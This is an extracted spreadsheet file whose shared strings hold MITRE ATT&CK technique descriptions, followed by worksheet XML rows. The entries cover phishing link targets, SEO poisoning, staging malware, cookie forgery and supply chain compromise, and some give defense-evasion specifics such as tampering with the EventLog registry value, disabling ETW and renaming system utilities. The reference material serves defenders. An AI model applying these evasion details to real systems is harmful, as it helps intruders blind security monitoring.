Typically, the resources for a link target will be an HTML page that may include some client-side script such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) to decide what content to serve to the user. Adversaries may clone legitimate sites to serve as the link target, this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003).(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) Adversaries may also [Upload Malware](https://attack.mitre.org/techniques/T1608/001) and have the link target point to malware for download/execution by the user.
Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Link shortening services can also be employed. Adversaries may also use free or paid accounts on Platform-as-a-Service providers to host link targets while taking advantage of the widely trusted domains of those providers to avoid being blocked.(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing)(Citation: Intezer App Service Phishing) Finally, adversaries may take advantage of the decentralized nature of the InterPlanetary File System (IPFS) to host link targets that are difficult to remove.(Citation: Talos IPFS 2022)</t>
  </si>
  <si>
    <t>T1608.006</t>
  </si>
  <si>
    <t>Stage Capabilities: SEO Poisoning</t>
  </si>
  <si>
    <t>Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.(Citation: Atlas SEO)(Citation: MalwareBytes SEO)
To help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries may stage content that explicitly manipulates SEO rankings in order to promote sites hosting their malicious payloads (such as [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)) within search engines. Poisoning SEO rankings may involve various tricks, such as stuffing keywords (including in the form of hidden text) into compromised sites. These keywords could be related to the interests/browsing habits of the intended victim(s) as well as more broad, seasonably popular topics (e.g. elections, trending news).(Citation: ZScaler SEO)(Citation: Atlas SEO)
Adversaries may also purchase or plant incoming links to staged capabilities in order to boost the site’s calculated relevance and reputation.(Citation: MalwareBytes SEO)(Citation: DFIR Report Gootloader)
SEO poisoning may also be combined with evasive redirects and other cloaking mechanisms (such as measuring mouse movements or serving content based on browser user agents, user language/localization settings, or HTTP headers) in order to feed SEO inputs while avoiding scrutiny from defenders.(Citation: ZScaler SEO)(Citation: Sophos Gootloader)</t>
  </si>
  <si>
    <t>T1608.001</t>
  </si>
  <si>
    <t>Stage Capabilities: Upload Malware</t>
  </si>
  <si>
    <t>Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.
Malware may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Malware can also be staged on web services, such as GitHub or Pastebin, or hosted on the InterPlanetary File System (IPFS), where decentralized content storage makes the removal of malicious files difficult.(Citation: Volexity Ocean Lotus November 2020)(Citation: Talos IPFS 2022)
Adversaries may upload backdoored files, such as application binaries, virtual machine images, or container images, to third-party software stores or repositories (ex: GitHub, CNET, AWS Community AMIs, Docker Hub). By chance encounter, victims may directly download/install these backdoored files via [User Execution](https://attack.mitre.org/techniques/T1204). [Masquerading](https://attack.mitre.org/techniques/T1036) may increase the chance of users mistakenly executing these files.</t>
  </si>
  <si>
    <t>T1608.002</t>
  </si>
  <si>
    <t>Stage Capabilities: Upload Tool</t>
  </si>
  <si>
    <t>Adversaries may upload tools to third-party or adversary controlled infrastructure to make it accessible during targeting. Tools can be open or closed source, free or commercial. Tools can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Adversaries may upload tools to support their operations, such as making a tool available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.
Tools may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).(Citation: Dell TG-3390) Tools can also be staged on web services, such as an adversary controlled GitHub repo, or on Platform-as-a-Service offerings that enable users to easily provision applications.(Citation: Dragos Heroku Watering Hole)(Citation: Malwarebytes Heroku Skimmers)(Citation: Intezer App Service Phishing)
Adversaries can avoid the need to upload a tool by having compromised victim machines download the tool directly from a third-party hosting location (ex: a non-adversary controlled GitHub repo), including the original hosting site of the tool.</t>
  </si>
  <si>
    <t>T1606.001</t>
  </si>
  <si>
    <t>Forge Web Credentials: Web Cookies</t>
  </si>
  <si>
    <t>Adversaries may forge web cookies that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies to authenticate and authorize user access.
Adversaries may generate these cookies in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539) and other similar behaviors in that the cookies are new and forged by the adversary, rather than stolen or intercepted from legitimate users. Most common web applications have standardized and documented cookie values that can be generated using provided tools or interfaces.(Citation: Pass The Cookie) The generation of web cookies often requires secret values, such as passwords, [Private Keys](https://attack.mitre.org/techniques/T1552/004), or other cryptographic seed values.
Once forged, adversaries may use these web cookies to access resources ([Web Session Cookie](https://attack.mitre.org/techniques/T1550/004)), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Volexity SolarWinds)(Citation: Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies January 2019)</t>
  </si>
  <si>
    <t>T1562.006</t>
  </si>
  <si>
    <t>Impair Defenses: Indicator Blocking</t>
  </si>
  <si>
    <t>An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting(Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW)(Citation: Microsoft About Event Tracing 2018), by tampering settings that control the collection and flow of event telemetry.(Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).
For example, adversaries may modify the `File` value in &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security&lt;/code&gt; to hide their malicious actions in a new or different .evtx log file. This action does not require a system reboot and takes effect immediately.(Citation: disable_win_evt_logging) 
ETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) &lt;code&gt;Set-EtwTraceProvider&lt;/code&gt; cmdlet or by interfacing directly with the Registry to make alterations.
In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products.
In Linux environments, adversaries may disable or reconfigure log processing tools such as syslog or nxlog to inhibit detection and monitoring capabilities to facilitate follow on behaviors (Citation: LemonDuck).</t>
  </si>
  <si>
    <t>T1036.003</t>
  </si>
  <si>
    <t>Masquerading: Rename System Utilities</t>
  </si>
  <si>
    <t>Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities adversaries are capable of abusing. (Citation: LOLBAS Main Site) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename &lt;code&gt;rundll32.exe&lt;/code&gt;). (Citation: Elastic Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>T1027.001</t>
  </si>
  <si>
    <t>Obfuscated Files or Information: Binary Padding</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations. 
Binary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ) </t>
  </si>
  <si>
    <t>T1518.001</t>
  </si>
  <si>
    <t>Software Discovery: Security Software Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Example commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), &lt;code&gt;reg query&lt;/code&gt; with [Reg](https://attack.mitre.org/software/S0075), &lt;code&gt;dir&lt;/code&gt; with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.
Adversaries may also utilize cloud APIs to discover the configurations of firewall rules within an environment.(Citation: Expel IO Evil in AWS) For example, the permitted IP ranges, ports or user accounts for the inbound/outbound rules of security groups, virtual firewalls established within AWS for EC2 and/or VPC instances, can be revealed by the &lt;code&gt;DescribeSecurityGroups&lt;/code&gt; action with various request parameters. (Citation: DescribeSecurityGroups - Amazon Elastic Compute Cloud)</t>
  </si>
  <si>
    <t>T1195.003</t>
  </si>
  <si>
    <t>Supply Chain Compromise: Compromise Hardware Supply Chain</t>
  </si>
  <si>
    <t>Adversaries may manipulate hardware components in products prior to receipt by a final consumer for the purpose of data or system compromise. By modifying hardware or firmware in the supply chain, adversaries can insert a backdoor into consumer networks that may be difficult to detect and give the adversary a high degree of control over the system. Hardware backdoors may be inserted into various devices, such as servers, workstations, network infrastructure, or peripherals.</t>
  </si>
  <si>
    <t>T1587.001</t>
  </si>
  <si>
    <t>Develop Capabilities: Malware</t>
  </si>
  <si>
    <t>Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)
As with legitimate development efforts, different skill sets may be required for developing malware. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's malware development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the malware.
Some aspects of malware development, such as C2 protocol development, may require adversaries to obtain additional infrastructure. For example, malware developed that will communicate with Twitter for C2, may require use of [Web Services](https://attack.mitre.org/techniques/T1583/006).(Citation: FireEye APT29)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</si>
</sst>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2" borderId="0" xfId="0" applyFill="1"/>
  </cellXfs>
  <cellStyles count="1">
    <cellStyle name="Normal" xfId="0" builtinId="0"/>
  </cellStyles>
  <dxfs count="3">
    <dxf>
      <font>
        <color rgb="FF9C0006"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFFFC7CE"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color rgb="FF9C0006"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFFFC7CE"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFFFC7CE"/>
          <bgColor rgb="FF0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BB537-A150-4F66-BA07-E570EC8E32EC}">
  <dimension ref="A1:C365"/>
  <sheetViews>
    <sheetView tabSelected="1" topLeftCell="A98" workbookViewId="0">
      <selection activeCell="V115" sqref="V115"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.5" x14ac:dyDescent="0.35"/>
  <sheetData>
    <row r="1" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A1" s="1" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="1" t="s">
        <v>1</v>
      </c>
      <c r="C1" s="1" t="s">
        <v>2</v>
      </c>
    </row>
    <row r="2" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A2" s="2" t="s">
        <v>18</v>
      </c>
      <c r="B2" s="2" t="s">
        <v>19</v>
      </c>
      <c r="C2" s="2" t="s">
        <v>20</v>
      </c>
    </row>
    <row r="3" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A3" t="s">
        <v>21</v>
      </c>
      <c r="B3" t="s">
        <v>22</v>
      </c>
      <c r="C3" t="s">
        <v>23</v>
      </c>
    </row>
    <row r="4" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A4" t="s">
        <v>24</v>
      </c>
      <c r="B4" t="s">
        <v>25</v>
      </c>
      <c r="C4" t="s">
        <v>26</v>
      </c>
    </row>
    <row r="5" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A5" t="s">
        <v>27</v>
      </c>
      <c r="B5" t="s">
        <v>28</v>
      </c>
      <c r="C5" t="s">
        <v>29</v>
      </c>
    </row>
    <row r="6" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A6" t="s">
        <v>30</v>
      </c>
      <c r="B6" t="s">
        <v>31</v>
      </c>
      <c r="C6" t="s">
        <v>32</v>
      </c>
    </row>
    <row r="7" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A7" t="s">
        <v>33</v>
      </c>
      <c r="B7" t="s">
        <v>34</v>
      </c>
      <c r="C7" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="8" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A8" t="s">
        <v>36</v>
      </c>
      <c r="B8" t="s">
        <v>37</v>
      </c>
      <c r="C8" t="s">
        <v>38</v>
      </c>
    </row>
    <row r="9" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A9" t="s">
        <v>39</v>
      </c>
      <c r="B9" t="s">
        <v>40</v>
      </c>
      <c r="C9" t="s">
        <v>41</v>
      </c>
    </row>
    <row r="10" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A10" t="s">
        <v>42</v>
      </c>
      <c r="B10" t="s">
        <v>43</v>
      </c>
      <c r="C10" t="s">
        <v>44</v>
      </c>
    </row>
    <row r="11" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A11" t="s">
        <v>45</v>
      </c>
      <c r="B11" t="s">
        <v>46</v>
      </c>
      <c r="C11" t="s">
        <v>47</v>
      </c>
    </row>
    <row r="12" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A12" t="s">
        <v>48</v>
      </c>
      <c r="B12" t="s">
        <v>49</v>
      </c>
      <c r="C12" t="s">
        <v>50</v>
      </c>
    </row>
    <row r="13" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A13" t="s">
        <v>51</v>
      </c>
      <c r="B13" t="s">
        <v>52</v>
      </c>
      <c r="C13" t="s">
        <v>53</v>
      </c>
    </row>
    <row r="14" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A14" t="s">
        <v>54</v>
      </c>
      <c r="B14" t="s">
        <v>55</v>
      </c>
      <c r="C14" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="15" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A15" t="s">
        <v>57</v>
      </c>
      <c r="B15" t="s">
        <v>58</v>
      </c>
      <c r="C15" t="s">
        <v>59</v>
      </c>
    </row>
    <row r="16" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A16" t="s">
        <v>60</v>
      </c>
      <c r="B16" t="s">
        <v>61</v>
      </c>
      <c r="C16" t="s">
        <v>62</v>
      </c>
    </row>
    <row r="17" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A17" t="s">
        <v>63</v>
      </c>
      <c r="B17" t="s">
        <v>64</v>
      </c>
      <c r="C17" t="s">
        <v>65</v>
      </c>
    </row>
    <row r="18" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A18" t="s">
        <v>66</v>
      </c>
      <c r="B18" t="s">
        <v>67</v>
      </c>
      <c r="C18" t="s">
        <v>68</v>
      </c>
    </row>
    <row r="19" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A19" t="s">
        <v>69</v>
      </c>
      <c r="B19" t="s">
        <v>70</v>
      </c>
      <c r="C19" t="s">
        <v>71</v>
      </c>
    </row>
    <row r="20" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A20" t="s">
        <v>72</v>
      </c>
      <c r="B20" t="s">
        <v>73</v>
      </c>
      <c r="C20" t="s">
        <v>74</v>
      </c>
    </row>
    <row r="21" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A21" t="s">
        <v>75</v>
      </c>
      <c r="B21" t="s">
        <v>76</v>
      </c>
      <c r="C21" t="s">
        <v>77</v>
      </c>
    </row>
    <row r="22" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A22" t="s">
        <v>78</v>
      </c>
      <c r="B22" t="s">
        <v>79</v>
      </c>
      <c r="C22" t="s">
        <v>80</v>
      </c>
    </row>
    <row r="23" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A23" t="s">
        <v>81</v>
      </c>
      <c r="B23" t="s">
        <v>82</v>
      </c>
      <c r="C23" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="24" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A24" t="s">
        <v>84</v>
      </c>
      <c r="B24" t="s">
        <v>85</v>
      </c>
      <c r="C24" t="s">
        <v>86</v>
      </c>
    </row>
    <row r="25" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A25" t="s">
        <v>87</v>
      </c>
      <c r="B25" t="s">
        <v>88</v>
      </c>
      <c r="C25" t="s">
        <v>89</v>
      </c>
    </row>
    <row r="26" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A26" t="s">
        <v>90</v>
      </c>
      <c r="B26" t="s">
        <v>91</v>
      </c>
      <c r="C26" t="s">
        <v>92</v>
      </c>
    </row>
    <row r="27" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A27" t="s">
        <v>93</v>
      </c>
      <c r="B27" t="s">
        <v>94</v>
      </c>
      <c r="C27" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="28" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A28" t="s">
        <v>96</v>
      </c>
      <c r="B28" t="s">
        <v>97</v>
      </c>
      <c r="C28" t="s">
        <v>98</v>
      </c>
    </row>
    <row r="29" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A29" t="s">
        <v>99</v>
      </c>
      <c r="B29" t="s">
        <v>100</v>
      </c>
      <c r="C29" t="s">
        <v>101</v>
      </c>
    </row>
    <row r="30" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A30" t="s">
        <v>102</v>
      </c>
      <c r="B30" t="s">
        <v>103</v>
      </c>
      <c r="C30" t="s">
        <v>104</v>
      </c>
    </row>
    <row r="31" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A31" t="s">
        <v>105</v>
      </c>
      <c r="B31" t="s">
        <v>106</v>
      </c>
      <c r="C31" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="32" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A32" t="s">
        <v>108</v>
      </c>
      <c r="B32" t="s">
        <v>109</v>
      </c>
      <c r="C32" t="s">
        <v>110</v>
      </c>
    </row>
    <row r="33" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A33" t="s">
        <v>111</v>
      </c>
      <c r="B33" t="s">
        <v>112</v>
      </c>
      <c r="C33" t="s">
        <v>113</v>
      </c>
    </row>
    <row r="34" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A34" t="s">
        <v>114</v>
      </c>
      <c r="B34" t="s">
        <v>115</v>
      </c>
      <c r="C34" t="s">
        <v>116</v>
      </c>
    </row>
    <row r="35" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A35" t="s">
        <v>117</v>
      </c>
      <c r="B35" t="s">
        <v>118</v>
      </c>
      <c r="C35" t="s">
        <v>119</v>
      </c>
    </row>
    <row r="36" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A36" t="s">
        <v>120</v>
      </c>
      <c r="B36" t="s">
        <v>121</v>
      </c>
      <c r="C36" t="s">
        <v>122</v>
      </c>
    </row>
    <row r="37" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A37" t="s">
        <v>123</v>
      </c>
      <c r="B37" t="s">
        <v>124</v>
      </c>
      <c r="C37" t="s">
        <v>125</v>
      </c>
    </row>
    <row r="38" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A38" t="s">
        <v>126</v>
      </c>
      <c r="B38" t="s">
        <v>127</v>
      </c>
      <c r="C38" t="s">
        <v>128</v>
      </c>
    </row>
    <row r="39" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A39" t="s">
        <v>129</v>
      </c>
      <c r="B39" t="s">
        <v>130</v>
      </c>
      <c r="C39" t="s">
        <v>131</v>
      </c>
    </row>
    <row r="40" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A40" t="s">
        <v>132</v>
      </c>
      <c r="B40" t="s">
        <v>133</v>
      </c>
      <c r="C40" t="s">
        <v>134</v>
      </c>
    </row>
    <row r="41" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A41" t="s">
        <v>135</v>
      </c>
      <c r="B41" t="s">
        <v>136</v>
      </c>
      <c r="C41" t="s">
        <v>137</v>
      </c>
    </row>
    <row r="42" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A42" t="s">
        <v>138</v>
      </c>
      <c r="B42" t="s">
        <v>139</v>
      </c>
      <c r="C42" t="s">
        <v>140</v>
      </c>
    </row>
    <row r="43" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A43" t="s">
        <v>141</v>
      </c>
      <c r="B43" t="s">
        <v>142</v>
      </c>
      <c r="C43" t="s">
        <v>143</v>
      </c>
    </row>
    <row r="44" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A44" t="s">
        <v>144</v>
      </c>
      <c r="B44" t="s">
        <v>145</v>
      </c>
      <c r="C44" t="s">
        <v>146</v>
      </c>
    </row>
    <row r="45" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A45" t="s">
        <v>147</v>
      </c>
      <c r="B45" t="s">
        <v>148</v>
      </c>
      <c r="C45" t="s">
        <v>149</v>
      </c>
    </row>
    <row r="46" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A46" t="s">
        <v>150</v>
      </c>
      <c r="B46" t="s">
        <v>151</v>
      </c>
      <c r="C46" t="s">
        <v>152</v>
      </c>
    </row>
    <row r="47" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A47" t="s">
        <v>153</v>
      </c>
      <c r="B47" t="s">
        <v>154</v>
      </c>
      <c r="C47" t="s">
        <v>155</v>
      </c>
    </row>
    <row r="48" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A48" t="s">
        <v>156</v>
      </c>
      <c r="B48" t="s">
        <v>157</v>
      </c>
      <c r="C48" t="s">
        <v>158</v>
      </c>
    </row>
    <row r="49" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A49" t="s">
        <v>159</v>
      </c>
      <c r="B49" t="s">
        <v>160</v>
      </c>
      <c r="C49" t="s">
        <v>161</v>
      </c>
    </row>
    <row r="50" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A50" t="s">
        <v>162</v>
      </c>
      <c r="B50" t="s">
        <v>163</v>
      </c>
      <c r="C50" t="s">
        <v>164</v>
      </c>
    </row>
    <row r="51" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A51" t="s">
        <v>165</v>
      </c>
      <c r="B51" t="s">
        <v>166</v>
      </c>
      <c r="C51" t="s">
        <v>167</v>
      </c>
    </row>
    <row r="52" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A52" t="s">
        <v>168</v>
      </c>
      <c r="B52" t="s">
        <v>169</v>
      </c>
      <c r="C52" t="s">
        <v>170</v>
      </c>
    </row>
    <row r="53" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A53" t="s">
        <v>171</v>
      </c>
      <c r="B53" t="s">
        <v>172</v>
      </c>
      <c r="C53" t="s">
        <v>173</v>
      </c>
    </row>
    <row r="54" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A54" t="s">
        <v>174</v>
      </c>
      <c r="B54" t="s">
        <v>175</v>
      </c>
      <c r="C54" t="s">
        <v>176</v>
      </c>
    </row>
    <row r="55" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A55" t="s">
        <v>177</v>
      </c>
      <c r="B55" t="s">
        <v>178</v>
      </c>
      <c r="C55" t="s">
        <v>179</v>
      </c>
    </row>
    <row r="56" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A56" t="s">
        <v>180</v>
      </c>
      <c r="B56" t="s">
        <v>181</v>
      </c>
      <c r="C56" t="s">
        <v>182</v>
      </c>
    </row>
    <row r="57" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A57" t="s">
        <v>183</v>
      </c>
      <c r="B57" t="s">
        <v>184</v>
      </c>
      <c r="C57" t="s">
        <v>185</v>
      </c>
    </row>
    <row r="58" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A58" t="s">
        <v>186</v>
      </c>
      <c r="B58" t="s">
        <v>187</v>
      </c>
      <c r="C58" t="s">
        <v>188</v>
      </c>
    </row>
    <row r="59" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A59" t="s">
        <v>189</v>
      </c>
      <c r="B59" t="s">
        <v>190</v>
      </c>
      <c r="C59" t="s">
        <v>191</v>
      </c>
    </row>
    <row r="60" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A60" t="s">
        <v>192</v>
      </c>
      <c r="B60" t="s">
        <v>193</v>
      </c>
      <c r="C60" t="s">
        <v>194</v>
      </c>
    </row>
    <row r="61" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A61" t="s">
        <v>195</v>
      </c>
      <c r="B61" t="s">
        <v>196</v>
      </c>
      <c r="C61" t="s">
        <v>197</v>
      </c>
    </row>
    <row r="62" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A62" t="s">
        <v>198</v>
      </c>
      <c r="B62" t="s">
        <v>199</v>
      </c>
      <c r="C62" t="s">
        <v>200</v>
      </c>
    </row>
    <row r="63" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A63" t="s">
        <v>201</v>
      </c>
      <c r="B63" t="s">
        <v>202</v>
      </c>
      <c r="C63" t="s">
        <v>203</v>
      </c>
    </row>
    <row r="64" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A64" t="s">
        <v>204</v>
      </c>
      <c r="B64" t="s">
        <v>205</v>
      </c>
      <c r="C64" t="s">
        <v>206</v>
      </c>
    </row>
    <row r="65" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A65" t="s">
        <v>207</v>
      </c>
      <c r="B65" t="s">
        <v>208</v>
      </c>
      <c r="C65" t="s">
        <v>209</v>
      </c>
    </row>
    <row r="66" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A66" t="s">
        <v>210</v>
      </c>
      <c r="B66" t="s">
        <v>211</v>
      </c>
      <c r="C66" t="s">
        <v>212</v>
      </c>
    </row>
    <row r="67" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A67" t="s">
        <v>213</v>
      </c>
      <c r="B67" t="s">
        <v>214</v>
      </c>
      <c r="C67" t="s">
        <v>215</v>
      </c>
    </row>
    <row r="68" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A68" t="s">
        <v>216</v>
      </c>
      <c r="B68" t="s">
        <v>217</v>
      </c>
      <c r="C68" t="s">
        <v>218</v>
      </c>
    </row>
    <row r="69" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A69" t="s">
        <v>219</v>
      </c>
      <c r="B69" t="s">
        <v>220</v>
      </c>
      <c r="C69" t="s">
        <v>221</v>
      </c>
    </row>
    <row r="70" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A70" t="s">
        <v>222</v>
      </c>
      <c r="B70" t="s">
        <v>223</v>
      </c>
      <c r="C70" t="s">
        <v>224</v>
      </c>
    </row>
    <row r="71" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A71" t="s">
        <v>225</v>
      </c>
      <c r="B71" t="s">
        <v>226</v>
      </c>
      <c r="C71" t="s">
        <v>227</v>
      </c>
    </row>
    <row r="72" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A72" t="s">
        <v>228</v>
      </c>
      <c r="B72" t="s">
        <v>229</v>
      </c>
      <c r="C72" t="s">
        <v>230</v>
      </c>
    </row>
    <row r="73" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A73" t="s">
        <v>231</v>
      </c>
      <c r="B73" t="s">
        <v>232</v>
      </c>
      <c r="C73" t="s">
        <v>233</v>
      </c>
    </row>
    <row r="74" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A74" t="s">
        <v>234</v>
      </c>
      <c r="B74" t="s">
        <v>235</v>
      </c>
      <c r="C74" t="s">
        <v>236</v>
      </c>
    </row>
    <row r="75" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A75" t="s">
        <v>237</v>
      </c>
      <c r="B75" t="s">
        <v>238</v>
      </c>
      <c r="C75" t="s">
        <v>239</v>
      </c>
    </row>
